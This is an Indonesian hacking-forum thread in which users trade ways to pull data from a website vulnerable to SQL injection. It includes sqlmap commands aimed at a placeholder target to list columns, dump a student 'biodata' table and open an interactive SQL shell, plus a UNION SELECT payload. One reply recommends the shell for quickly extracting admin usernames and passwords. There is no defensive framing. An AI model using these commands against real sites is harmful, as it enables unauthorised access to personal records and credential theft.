Posts: 60
Threads: 10
Joined: Feb 2012
Bagaimana cara memasukkan Query SQL ke dalam SQL Injection?
Misalnya, kita punya web target yang vuln SQL Inject. Dan gunakan sqlmap dengan perintah ini.
Code: sqlmap.py -u http://target.com/id=1 -D mahasiswa -T biodata --columns
Jika kita ingin memasukkan Query SQL di bawah ini bagaimana?
Code: SELECT * FROM biodata WHERE fakultas='teknik'
Posts: 700
Threads: 45
Joined: Nov 2012
(01-05-2015, 08:18 PM)Carolus Wrote: Bagaimana cara memasukkan Query SQL ke dalam SQL Injection?
Misalnya, kita punya web target yang vuln SQL Inject. Dan gunakan sqlmap dengan perintah ini.
Code: sqlmap.py -u http://target.com/id=1 -D mahasiswa -T biodata --columns
Jika kita ingin memasukkan Query SQL di bawah ini bagaimana?
Code: SELECT * FROM biodata WHERE fakultas='teknik'
gimana ya, ane bingung jelasinnya om :v
coba Cek thread ini om ->
SQL Injection Cheat Sheet
Simple and Fast Sqli Manual
Banyak pencerahan disana ![[Image: smiley-transport012.gif]](http://www.freesmileys.org/smileys/smiley-transport012.gif)
Jangan Makan Tulang Kawan | Kurawa |
Posts: 929
Threads: 141
Joined: Jul 2011
union select 1,2,group_concat(column_name) from information_schema.tables where table.name='biodata'
begitukah maksudnya? ane jg gak paham 
ada kodok teroret teroret dipinggir kali terorret teroret mencari makan teroret teroret setiap pagi teroret teroret
visit: http://warungiso.blogspot.com/
I was not smart or special but I was unix
Posts: 700
Threads: 45
Joined: Nov 2012
(01-06-2015, 02:12 PM)wine trochanter Wrote: union select 1,2,group_concat(column_name) from information_schema.tables where table.name='biodata'
begitukah maksudnya? ane jg gak paham
nah tukang suntiknya datang ![[Image: smiley-sex018.gif]](http://www.freesmileys.org/smileys/smiley-sex018.gif)
Jangan Makan Tulang Kawan | Kurawa |
Posts: 4
Threads: 0
Joined: Oct 2014
sqlmap.py -u http://target.com/id=1 -D mahasiswa -T biodata -C fakultas --dump
gitu ya?
Posts: 103
Threads: 8
Joined: May 2013
Maksudnya gini bro ? sqlmap.py -u http://target.com/id=1 --sql-shell. Nanti kalau udah masuk sql-shell, baru masukin perintah query sql yang ente mau ?
Jika kamu tidak sanggup menanggung lelahnya belajar, maka kamu akan menanggung perihnya kebodohan (Imam Syafii)
Posts: 60
Threads: 10
Joined: Feb 2012
(01-06-2015, 02:12 PM)wine trochanter Wrote: union select 1,2,group_concat(column_name) from information_schema.tables where table.name='biodata'
begitukah maksudnya? ane jg gak paham
Kalo itu kan kita hanya nampilin semua yang ada di table biodata.
Kalo pengen spesifik gimana? Misal di tabel biodata ada kolom fakultas, dimana kolom fakultas terdiri dari A, B, C, dll. Nah, yang saya maksudkan, gimana cara nampilin yang hanya fakultas A saja misalnya, yang fakultas B, C, dll engga tampil.
Atau misal yang mempunyai nama A, nama yang lain tidak tampil.
(01-09-2015, 07:08 PM)devilscream Wrote: sqlmap.py -u http://target.com/id=1 -D mahasiswa -T biodata -C fakultas --dump
gitu ya?
Kalo seperti itu hasilnya cuman nge-dump data yang ada di kolom fakultas.
(01-09-2015, 07:57 PM)dharaninja Wrote: Maksudnya gini bro ? sqlmap.py -u http://target.com/id=1 --sql-shell. Nanti kalau udah masuk sql-shell, baru masukin perintah query sql yang ente mau ?
Cara gunainnya gimana itu sql-shell?
Posts: 103
Threads: 8
Joined: May 2013
(01-11-2015, 09:17 PM)Carolus Wrote: (01-06-2015, 02:12 PM)wine trochanter Wrote: union select 1,2,group_concat(column_name) from information_schema.tables where table.name='biodata'
begitukah maksudnya? ane jg gak paham
Kalo itu kan kita hanya nampilin semua yang ada di table biodata.
Kalo pengen spesifik gimana? Misal di tabel biodata ada kolom fakultas, dimana kolom fakultas terdiri dari A, B, C, dll. Nah, yang saya maksudkan, gimana cara nampilin yang hanya fakultas A saja misalnya, yang fakultas B, C, dll engga tampil.
Atau misal yang mempunyai nama A, nama yang lain tidak tampil.
(01-09-2015, 07:08 PM)devilscream Wrote: sqlmap.py -u http://target.com/id=1 -D mahasiswa -T biodata -C fakultas --dump
gitu ya?
Kalo seperti itu hasilnya cuman nge-dump data yang ada di kolom fakultas.
(01-09-2015, 07:57 PM)dharaninja Wrote: Maksudnya gini bro ? sqlmap.py -u http://target.com/id=1 --sql-shell. Nanti kalau udah masuk sql-shell, baru masukin perintah query sql yang ente mau ?
Cara gunainnya gimana itu sql-shell?
Ya, sql-shell kita makenya kaya masukin perintah mysql biasa aja. Sebagai contoh ada nama tablenya table_admin, kalau kita ngedump table_admin yang berisi username dan password yang row nya banyak, akan terasa lambat dan menguras waktu. Untuk mempersingkat waktu gunakan sql-shell, SELECT * FROM table_admin;
Jika kamu tidak sanggup menanggung lelahnya belajar, maka kamu akan menanggung perihnya kebodohan (Imam Syafii)
|
